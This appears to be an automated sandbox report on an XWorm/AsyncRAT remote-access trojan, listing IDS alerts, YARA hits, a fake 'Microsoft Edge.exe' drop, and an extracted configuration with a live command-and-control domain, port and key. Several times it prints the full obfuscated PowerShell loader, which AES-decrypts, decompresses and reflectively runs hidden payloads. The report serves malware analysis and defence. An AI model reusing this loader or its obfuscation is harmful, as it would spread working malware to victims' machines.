$GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispo

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-08T20:07:07.869531+010028528701Malware Command and Control Activity Detected147.185.221.2450751192.168.2.450003TCP
                    2025-01-08T20:07:37.901866+010028528701Malware Command and Control Activity Detected147.185.221.2450751192.168.2.450003TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2025-01-08T20:07:07.869531+010028528741Malware Command and Control Activity Detected147.185.221.2450751192.168.2.450003TCP
                    2025-01-08T20:07:37.901866+010028528741Malware Command and Control Activity Detected147.185.221.2450751192.168.2.450003TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: product-hack.gl.at.ply.ggAvira URL Cloud: Label: malware
                    Antivirus detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\startup_str_533.vbsAvira: detection malicious, Label: VBS/Batrunner.OA
                    Found malware configuration
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["product-hack.gl.at.ply.gg"], "Port": 50751, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.0% probability
                    Sample uses string decryption to hide its real strings
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: product-hack.gl.at.ply.gg
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: 50751
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.6
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: %AppData%
                    Source: 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmpString decryptor: Microsoft Edge.exe
                    Source: Binary string: powershell.pdbUGP source: Microsoft Edge.exe, 00000019.00000000.2861398086.00007FF6CC82A000.00000002.00000001.01000000.0000000A.sdmp, Microsoft Edge.exe.9.dr
                    Source: Binary string: powershell.pdb source: Microsoft Edge.exe, 00000019.00000000.2861398086.00007FF6CC82A000.00000002.00000001.01000000.0000000A.sdmp, Microsoft Edge.exe.9.dr

                    Software Vulnerabilities

                    barindex
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 147.185.221.24:50751 -> 192.168.2.4:50003
                    Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 147.185.221.24:50751 -> 192.168.2.4:50003
                    C2 URLs / IPs found in malware configuration
                    Source: Malware configuration extractorURLs: product-hack.gl.at.ply.gg
                    Yara detected Generic Downloader
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, type: UNPACKEDPE
                    Source: global trafficTCP traffic: 192.168.2.4:50003 -> 147.185.221.24:50751
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                    Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
                    Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
                    Source: unknownDNS query: name: ip-api.com
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: ip-api.com
                    Source: global trafficDNS traffic detected: DNS query: product-hack.gl.at.ply.gg
                    Source: powershell.exe, 0000000B.00000002.2027903424.000001B76DAF9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2235585515.00000298F4CF3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2811930482.000002CCFE4F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                    Source: powershell.exe, 0000000B.00000002.2027903424.000001B76DAF9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2235585515.00000298F4CF3000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2811930482.000002CCFE4F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                    Source: powershell.exe, 00000015.00000002.2550329168.000002CCE5C37000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micros
                    Source: powershell.exe, 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD93E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD93CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
                    Source: powershell.exe, 00000009.00000002.2963252000.0000013CD83B1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD93C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
                    Source: powershell.exe, 00000002.00000002.1864300587.000002752EAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1772363850.00000221717B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DCA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DDBAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200ABFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE7205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE6028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000002.00000002.1817404897.000002751E841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751121676.0000022161741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD78E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DC801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE5E01000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000019.00000002.2961235884.000002592E7B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DCA29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DDBAC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAE29000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200ABFF1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE7205000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE6028000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1778569949.0000022179CFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
                    Source: powershell.exe, 00000002.00000002.1817404897.000002751E841000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1751121676.0000022161741000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.2963252000.0000013CD78E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1902992947.000001B755571000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2076799147.00000298DC801000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.2280958259.00000200AAC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000015.00000002.2551099104.000002CCE5E01000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000019.00000002.2961235884.000002592E7F5000.00000004.00000800.00020000.00000000.sdmp, Microsoft Edge.exe, 00000019.00000002.2961235884.000002592E80D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000003.00000002.1751121676.0000022161968000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000012.00000002.2494306948.00000200C3272000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ation.resou
                    Source: powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 0000000B.00000002.1902992947.000001B755799000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: Microsoft Edge.exe, 00000019.00000002.2961235884.000002592F08A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: Microsoft Edge.exe, 00000019.00000002.3198445856.0000025946C68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                    Source: powershell.exe, 00000002.00000002.1864300587.000002752EAB6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1772363850.00000221717B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2009534188.000001B7655E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Reads the Security eventlog
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                    Reads the System eventlog
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\PowerShell
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

                    Operating System Destruction

                    barindex
                    Protects its processes via BreakOnTermination flag
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: 01 00 00 00 Jump to behavior

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 9.2.powershell.exe.13cd9398610.0.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13cd9398610.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13ce7acbf20.2.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13ce7acbf20.2.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13ce7a7bee8.3.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13cd9398610.0.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13cd9398610.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13ce7acbf20.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13ce7a53eb0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, type: UNPACKEDPEMatched rule: Finds XWorm (version XClient, v3) samples based on characteristic strings Author: Sekoia.io
                    Source: 9.2.powershell.exe.13ce7a10e78.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000009.00000002.3313915112.0000013CE7954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000009.00000002.2963252000.0000013CD9346000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Source: 00000009.00000002.3313915112.0000013CE7ACB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
                    Powershell drops PE file
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Microsoft Edge.exeJump to dropped file
                    Windows Scripting host queries suspicious COM object (likely to drop second stage)
                    Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                    Wscript starts Powershell (via cmd or directly)
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_533.bat" "
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\Desktop\startup_str_466.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\Desktop\startup_str_466.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\startup_str_533.bat" "Jump to behavior
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ZQhxkXfKvYDHcogNKRW5YPx3hZrh58mWNx9RrajXNmA='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Y2K5ELOH/96mWkCY8rovsg=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $GqTYR=New-Object System.IO.MemoryStream(,$param_var); $hYvQx=New-Object System.IO.MemoryStream; $QmyLf=New-Object System.IO.Compression.GZipStream($GqTYR, [IO.Compression.CompressionMode]::Decompress); $QmyLf.CopyTo($hYvQx); $QmyLf.Dispose(); $GqTYR.Dispose(); $hYvQx.Dispose(); $hYvQx.ToArray();}function execute_function($param_var,$param2_var){ $IwCxB=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $rUbak=$IwCxB.EntryPoint; $rUbak.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\user\AppData\Roaming\startup_str_533.bat';$AEDnq=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\user\AppData\Roaming\startup_str_533.bat').Split([Environment]::NewLine);foreach ($cCaqv in $AEDnq) { if ($cCaqv.StartsWith(':: ')) { $Drdpt=$cCaqv.Substring(3); break; }}$payloads_var=[string[]]$Drdpt.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B975BB32_2_00007FFD9B975BB3
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00007FFD9B970ED82_2_00007FFD9B970ED8
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 11_2_00007FFD9B9630E911_2_00007FFD9B9630E9
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B89407016_2_00007FFD9B894070
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_00007FFD9B962AA116_2_00007FFD9B962AA1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B88407018_2_00007FFD9B884070
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 18_2_00007FFD9B952AE518_2_00007FFD9B952AE5
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 21_2_00007FFD9B89407021_2_00007FFD9B894070
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B8ADA2025_2_00007FFD9B8ADA20
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B89F8D125_2_00007FFD9B89F8D1
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B896E0025_2_00007FFD9B896E00
                    Source: C:\Users\user\AppData\Roaming\Microsoft Edge.exeCode function: 25_2_00007FFD9B89F65825_2_00007FFD9B89F658
